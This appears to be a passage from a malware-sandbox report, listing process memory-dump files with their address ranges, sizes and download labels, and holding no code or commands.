memory/3376-303-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-315-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-271-0x00000000059D0000-0x0000000005B1A000-memory.dmp

Filesize
1.3MB

Download
memory/3376-247-0x0000000000B80000-0x0000000000FD8000-memory.dmp

Filesize
4.3MB

Download
memory/3376-323-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-295-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-297-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-299-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-321-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-319-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-317-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-313-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-312-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-309-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-307-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-305-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3376-301-0x00000000057D0000-0x00000000057E5000-memory.dmp

Filesize
84KB

Download
memory/3604-520-0x00007FF694660000-0x00007FF694DCE000-memory.dmp

Filesize
7.4MB

Download
memory/3604-2-0x00007FFEBE9A0000-0x00007FFEBE9A2000-memory.dmp

Filesize
8KB

Download
memory/3604-7-0x00007FFEBC370000-0x00007FFEBC372000-memory.dmp

Filesize
8KB

Download
memory/3604-519-0x00007FF6947C5000-0x00007FF694A67000-memory.dmp

Filesize
2.6MB

Download
memory/3604-0-0x00007FF6947C5000-0x00007FF694A67000-memory.dmp

Filesize
2.6MB

Download
memory/3604-3-0x00007FFEBD170000-0x00007FFEBD172000-memory.dmp

Filesize
8KB

Download
memory/3604-5-0x00007FF694660000-0x00007FF694DCE000-memory.dmp

Filesize
7.4MB

Download
memory/3604-8-0x00007FF694660000-0x00007FF694DCE000-memory.dmp

Filesize
7.4MB

Download
memory/3604-4-0x00007FFEBD180000-0x00007FFEBD182000-memory.dmp

Filesize
8KB

Download
memory/3604-1-0x00007FFEBE990000-0x00007FFEBE992000-memory.dmp

Filesize
8KB

Download
memory/3604-6-0x00007FFEBC360000-0x00007FFEBC362000-memory.dmp

Filesize
8KB

Download
memory/3604-50-0x00000229210D0000-0x0000022921153000-memory.dmp

Filesize
524KB

Download
memory/3604-22-0x00007FF694660000-0x00007FF694DCE000-memory.dmp

Filesize
7.4MB

Download
memory/3604-21-0x00007FF6947C5000-0x00007FF694A67000-memory.dmp

Filesize
2.6MB

Download
memory/3604-19-0x00000229210D0000-0x0000022921153000-memory.dmp

Filesize
524KB

Download
memory/3780-703-0x0000000005D70000-0x0000000005D92000-memory.dmp

Filesize
136KB

Download
memory/3780-719-0x00000000064E0000-0x00000000064FE000-memory.dmp

Filesize
120KB

Download
memory/3780-700-0x0000000005640000-0x0000000005C68000-memory.dmp

Filesize
6.2MB

Download
memory/3780-712-0x00000000060D0000-0x0000000006424000-memory.dmp

Filesize
3.3MB

Download
memory/3780-707-0x0000000005E10000-0x0000000005E76000-memory.dmp

Filesize
408KB

Download
memory/3780-699-0x0000000002BE0000-0x0000000002C16000-memory.dmp

Filesize
216KB

Download
memory/4556-1320-0x0000000000FF0000-0x0000000001522000-memory.dmp

Filesize
5.2MB

Download
memory/4556-226-0x0000000000FF0000-0x0000000001522000-memory.dmp

Filesize
5.2MB

Download
memory/4556-222-0x0000000000FF0000-0x0000000001522000-memory.dmp

Filesize
5.2MB

Download
memory/4676-248-0x0000000004ED0000-0x0000000004F6C000-memory.dmp

Filesize
624KB

Download
memory/4676-260-0x0000000004F70000-0x000000000505A000-memory.dmp

Filesize
936KB

Download
memory/4676-244-0x0000000000150000-0x00000000003EE000-memory.dmp

Filesize
2.6MB

Download
memory/4676-275-0x0000000005060000-0x0000000005130000-memory.dmp

Filesize
832KB

Download
memory/4676-277-0x0000000004D20000-0x0000000004D3C000-memory.dmp

Filesize
112KB

Download
memory/4856-254-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

Filesize
4KB

Download
memory/4856-234-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

Filesize
4KB

Download
memory/5052-255-0x0000000000400000-0x0000000000648000-memory.dmp

Filesize
2.3MB

Download
memory/5052-257-0x0000000000400000-0x0000000000648000-memory.dmp

Filesize
2.3MB

Download
memory/5052-253-0x0000000000400000-0x0000000000648000-memory.dmp

Filesize
2.3MB

Download
memory/5292-742-0x000000000A680000-0x000000000ABAC000-memory.dmp

Filesize
5.2MB

Download
memory/5292-727-0x0000000006F10000-0x0000000006F2E000-memory.dmp

Filesize
120KB

Download
memory/5292-726-0x00000000090E0000-0x0000000009156000-memory.dmp

Filesize
472KB

Download
memory/5292-741-0x0000000009F80000-0x000000000A142000-memory.dmp

Filesize
1.8MB

Download
memory/5292-562-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/5488-533-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/5488-551-0x00000000059C0000-0x00000000059D2000-memory.dmp

Filesize
72KB

Download
memory/5488-544-0x0000000005740000-0x000000000574A000-memory.dmp

Filesize
40KB

Download
memory/5488-541-0x0000000005760000-0x00000000057F2000-memory.dmp

Filesize
584KB

Download
memory/5488-1130-0x00000000079A0000-0x00000000079F0000-memory.dmp

Filesize
320KB

Download
memory/5488-555-0x0000000005BA0000-0x0000000005BEC000-memory.dmp

Filesize
304KB

Download
memory/5488-552-0x0000000005A20000-0x0000000005A5C000-memory.dmp

Filesize
240KB

Download
memory/5488-550-0x0000000005A90000-0x0000000005B9A000-memory.dmp

Filesize
1.0MB

Download
memory/5488-642-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/5488-537-0x0000000005C70000-0x0000000006214000-memory.dmp

Filesize
5.6MB

Download
memory/5488-549-0x0000000006840000-0x0000000006E58000-memory.dmp

Filesize
6.1MB

Download
memory/5708-539-0x0000000000400000-0x0000000000670000-memory.dmp

Filesize
2.4MB

Download
memory/5708-548-0x0000000000400000-0x0000000000670000-memory.dmp

Filesize
2.4MB

Download
memory/5780-1236-0x0000000004340000-0x0000000004694000-memory.dmp

Filesize
3.3MB

Download
memory/6036-558-0x0000000000400000-0x0000000000670000-memory.dmp

Filesize
2.4MB

Download